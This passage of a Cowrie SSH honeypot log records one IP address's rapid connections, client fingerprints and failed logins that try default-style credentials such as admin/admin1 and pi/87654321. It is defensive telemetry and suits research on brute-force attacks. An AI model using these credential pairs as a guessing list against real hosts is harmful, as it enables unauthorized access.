stp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.313888Z","src_ip":"87.120.191.13","session":"3891814ba55c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.381241Z","src_ip":"87.120.191.13","session":"5217c66aa9b4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.382777Z","src_ip":"87.120.191.13","session":"5217c66aa9b4"}
{"eventid":"cowrie.login.failed","username":"student","password":"cancel","message":"login attempt [student/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.487787Z","src_ip":"87.120.191.13","session":"d2a61d330f0a"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"cancel","message":"login attempt [ubnt/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.535001Z","src_ip":"87.120.191.13","session":"2602fd613b81"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"cancel","message":"login attempt [ftpuser/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.556875Z","src_ip":"87.120.191.13","session":"c217c72170da"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.573056Z","src_ip":"87.120.191.13","session":"d992c74026c9"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35132,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8384c73ffe6","protocol":"ssh","message":"New connection: 87.120.191.13:35132 (1.2.3.4:22) [session: d8384c73ffe6]","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.624817Z"}
{"eventid":"cowrie.login.failed","username":"noc","password":"cancel","message":"login attempt [noc/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.722436Z","src_ip":"87.120.191.13","session":"3891814ba55c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.726907Z","src_ip":"87.120.191.13","session":"d8384c73ffe6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.727660Z","src_ip":"87.120.191.13","session":"d8384c73ffe6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cancel","message":"login attempt [admin/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.820531Z","src_ip":"87.120.191.13","session":"5217c66aa9b4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"cancel","message":"login attempt [pi/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.150753Z","src_ip":"87.120.191.13","session":"d8384c73ffe6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.342744Z","src_ip":"87.120.191.13","session":"f63c290c718f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35142,"dst_ip":"1.2.3.4","dst_port":22,"session":"974c347ca4dc","protocol":"ssh","message":"New connection: 87.120.191.13:35142 (1.2.3.4:22) [session: 974c347ca4dc]","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.364839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.424789Z","src_ip":"87.120.191.13","session":"974c347ca4dc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.425473Z","src_ip":"87.120.191.13","session":"974c347ca4dc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.548868Z","src_ip":"87.120.191.13","session":"d2a61d330f0a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35152,"dst_ip":"1.2.3.4","dst_port":22,"session":"814dd5b8acca","protocol":"ssh","message":"New connection: 87.120.191.13:35152 (1.2.3.4:22) [session: 814dd5b8acca]","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.580678Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.584421Z","src_ip":"87.120.191.13","session":"2602fd613b81"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.596569Z","src_ip":"87.120.191.13","session":"814dd5b8acca"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.598698Z","src_ip":"87.120.191.13","session":"c217c72170da"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35164,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d2a89faca2a","protocol":"ssh","message":"New connection: 87.120.191.13:35164 (1.2.3.4:22) [session: 6d2a89faca2a]","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.617543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.618793Z","src_ip":"87.120.191.13","session":"6d2a89faca2a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35176,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c357538baa4","protocol":"ssh","message":"New connection: 87.120.191.13:35176 (1.2.3.4:22) [session: 5c357538baa4]","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.630566Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.743917Z","src_ip":"87.120.191.13","session":"3891814ba55c"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35188,"dst_ip":"1.2.3.4","dst_port":22,"session":"37cc6b7acc65","protocol":"ssh","message":"New connection: 87.120.191.13:35188 (1.2.3.4:22) [session: 37cc6b7acc65]","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.763364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.764354Z","src_ip":"87.120.191.13","session":"37cc6b7acc65"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.901883Z","src_ip":"87.120.191.13","session":"5217c66aa9b4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35194,"dst_ip":"1.2.3.4","dst_port":22,"session":"052f65e28058","protocol":"ssh","message":"New connection: 87.120.191.13:35194 (1.2.3.4:22) [session: 052f65e28058]","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.934945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.975436Z","src_ip":"87.120.191.13","session":"052f65e28058"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:47.976200Z","src_ip":"87.120.191.13","session":"052f65e28058"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:48.187136Z","src_ip":"87.120.191.13","session":"d8384c73ffe6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"87654321","message":"login attempt [admin/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:48.192092Z","src_ip":"87.120.191.13","session":"052f65e28058"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35196,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d4a2fb3a5de","protocol":"ssh","message":"New connection: 87.120.191.13:35196 (1.2.3.4:22) [session: 9d4a2fb3a5de]","sensor":"my-vps","timestamp":"2025-08-26T01:53:48.229728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:48.240534Z","src_ip":"87.120.191.13","session":"9d4a2fb3a5de"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:48.268871Z","src_ip":"87.120.191.13","session":"9d4a2fb3a5de"}
{"eventid":"cowrie.login.failed","username":"pi","password":"87654321","message":"login attempt [pi/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:48.446161Z","src_ip":"87.120.191.13","session":"9d4a2fb3a5de"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.355089Z","src_ip":"87.120.191.13","session":"052f65e28058"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35198,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dad21c07118","protocol":"ssh","message":"New connection: 87.120.191.13:35198 (1.2.3.4:22) [session: 8dad21c07118]","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.375578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.585430Z","src_ip":"87.120.191.13","session":"8dad21c07118"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.586108Z","src_ip":"87.120.191.13","session":"8dad21c07118"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.780574Z","src_ip":"87.120.191.13","session":"9d4a2fb3a5de"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35208,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfb69d0b5826","protocol":"ssh","message":"New connection: 87.120.191.13:35208 (1.2.3.4:22) [session: dfb69d0b5826]","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.820608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.871844Z","src_ip":"87.120.191.13","session":"dfb69d0b5826"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.872773Z","src_ip":"87.120.191.13","session":"dfb69d0b5826"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1","message":"login attempt [admin/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:49.937933Z","src_ip":"87.120.191.13","session":"8dad21c07118"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin1","message":"login attempt [pi/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:50.077178Z","src_ip":"87.120.191.13","session":"dfb69d0b5826"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:50.960231Z","src_ip":"87.120.191.13","session":"8dad21c07118"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35218,"dst_ip":"1.2.3.4","dst_port":22,"session":"9043e19523b4","protocol":"ssh","message":"New connection: 87.120.191.13:35218 (1.2.3.4:22) [session: 9043e19523b4]","sensor":"my-vps","timestamp":"2025-08-26T01:53:50.979357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:50.980187Z","src_ip":"87.120.191.13","session":"9043e19523b4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:51.000107Z","src_ip":"87.120.191.13","session":"9043e19523b4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:51.061787Z","src_ip":"87.120.191.13","session":"9043e19523b4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:51.098279Z","src_ip":"87.120.191.13","session":"dfb69d0b5826"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35234,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa70a0bf88c0","protocol":"ssh","message":"New connection: 87.120.191.13:35234 (1.2.3.4:22) [session: fa70a0bf88c0]","sensor":"my-vps","timestamp":"2025-08-26T01:53:51.118121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:51.118875Z","src_ip":"87.120.191.13","session":"fa70a0bf88c0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 